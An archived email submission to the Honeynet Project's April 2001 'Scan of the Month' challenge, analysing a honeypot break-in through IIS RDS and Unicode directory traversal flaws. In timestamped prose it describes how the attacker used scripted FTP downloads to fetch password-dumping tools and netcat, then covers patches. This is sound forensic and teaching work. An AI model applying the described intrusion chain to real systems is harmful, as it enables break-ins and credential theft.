From jmluedtke@ucdavis.edu Fri Apr 20 20:32:16 2001 Date: Thu, 19 Apr 2001 17:53:24 -0700 (PDT) From: Jessica Luedtke To: project@honeynet.org Subject: Scan of the Month - April Thanks...this was an interesting exercise! Jessica Luedtke ******************* 1. Exploits used to attack the system: The exploits used were the IIS RDS vulnerabilty exploit[1] and the Extended Unicode directory transversal vulnerability[2]. The IIS RDS vulnerability allows an attacker to take advantage of the shell() VBA command to run abitrary commands on the vulnerable box. The directory transversal vulnerability allows the attacker to view, modify, delete, or execute any file that is 1. on the same logical drive as any web-accessible file and 2. accessible by the groups the IUSR_machinename account is a member of (Everyone and Users by default). 2. How were the exploits used to access and control the system? (Timestamps indicate the time of the start of that portion of the attack, according to the log) 02/04-05:25:22.525676 - After viewing the webpage and the guestbook page, the attacker attempted to exploit the directory transversal vulnerability to retreive the file boot.ini. The attempt was successful. From this file, the attacker was able to determine the OS and several details about the system setup. The exploit used for directory transversal appears to be scripted, because the same four possible variations of the exploit were tried every time, in the same order, and all four variations were sent at the same time. However, based on the headers, the attacker appears to have used an ordinary web browser to perform the attack (the same browser he used to view the website, in fact). Interesting. 02/04-05:27:08.159193 - The attacker checked to see if the box was vulnerable to the IIS RDS vulnerability by checking for a directory named msadc, and the file msadcs.dll within that directory. Upon determining that they were indeed there, he ran an exploit against the vulnerability, creating a file named "fun" in the root directory of the C: drive. He utilized the directory transversal vulnerability to view this file, verifying that the exploit had worked. The particular exploit used appears to be msadc.pl, written by rain forest puppy, due to the signature MIME boundary of !ADM!ROX!YOUR!WORLD! and the similarity between the output of msadc.pl and the traffic from the attacker[3]. 02/04-05:32:51.574859 - The attacker used the exploit to echo commands one line at a time into a file, creating an ftp script designed to connect to a remote server (nether.net, a provider of free shell accounts) and download several files. However, the account did not work (which he did not realize, as this exploit does not provide any feedback, so he was essentially working blindly). He attemped to run the password recovery program he had tried to download, and upload the results to the same ftp server. 02/04-05:34:47.612437 - When the previous attack did not work, the attacker attempted to download the files from an FTP server on his own computer, after verifying that he could connect to it. However, this did not work because he used > instead of >> when writing the second line of the script, overwriting the file instead of appending it. 02/04-05:38:27.521384 - The attacker rewrote the ftp script again and tried a third server, which failed because he forgot to echo the first command he was attempting to run to the ftp script. 02/04-05:40:11.229519 - The attacker tried once again to connect to the FTP server on his computer. At this point, he appeared to be either confused or experimenting, as he made several mistakes, and was again unsuccessful. 02/04-05:41:03.136533 - The attacker gave up on the IIS RDC vulnerability, and tried writing and executing the script via the directory transversal vulnerability. This time he got everything correct, and it worked. He connected to the FTP server running on his computer and downloaded the files. 3. What was done once access was gained? Based on a web search for the file names, the files downloaded appear to most likely be a password recovery program (pdump.exe and samdump.dll) and a program which allows remote connections from a specific IP address (nc.exe). This would allow for the possibility of further control over the computer, and/or compromised passwords. 4. How could this attack have been prevented? Solutions are available to both vulnerabilities. A patch for the directory transversal attack can be obtained from Microsoft[4]. The RDS vulnerability can be fixed by either removing the MDAC capabilities entirely, upgrading to a newer version, restricting access to the directory, or filtering incoming requests. 5. How much time did you spend on this analysis and writeup? Approximatly 5 hours. Bonus: Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not? The site compromised was rain forest puppy's, and he was involved in the research and development for both vulnerabilities exploited in this attack. Even if the attacker did not make that connection, the website is obviously security oriented, and the attacker apparently viewed it with an ordinary web browser before performing the attack. Therefor, it's quite likely that the attacker realized when his attack succeeded (if not before) that the box was a honeypot, as there would be no other likely reason for a box run by someone who knows about the exploit and is concerned about security to be vulnerable to it. References: [1] http://www.securityfocus.com/bid/529 [2] http://www.securityfocus.com/bid/1806 [3] http://www.securityfocus.com/data/vulnerabilities/exploits/msadc.pl [4] http://www.microsoft.com/technet/security/bulletin/ms00-057.asp